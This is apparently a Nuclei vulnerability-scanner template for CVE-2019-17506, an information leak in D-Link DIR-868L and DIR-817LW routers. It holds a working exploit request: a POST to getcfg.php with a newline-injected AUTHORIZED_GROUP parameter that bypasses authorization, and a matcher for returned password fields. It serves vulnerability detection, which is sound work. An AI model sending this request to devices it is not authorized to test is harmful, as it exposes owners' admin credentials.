30 lines
596 B
YAML
30 lines
596 B
YAML
id: CVE-2019-17506
|
|
|
|
info:
|
|
name: DLINK DIR-868L & DIR-817LW Info Leak
|
|
author: pikpikcu
|
|
severity: critical
|
|
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17506
|
|
tags: cve,cve2019,dlink
|
|
|
|
requests:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/getcfg.php"
|
|
|
|
body: |
|
|
SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
|
|
headers:
|
|
Content-Type: text/xml
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "</password>"
|
|
- "DEVICE.ACCOUNT"
|
|
part: body
|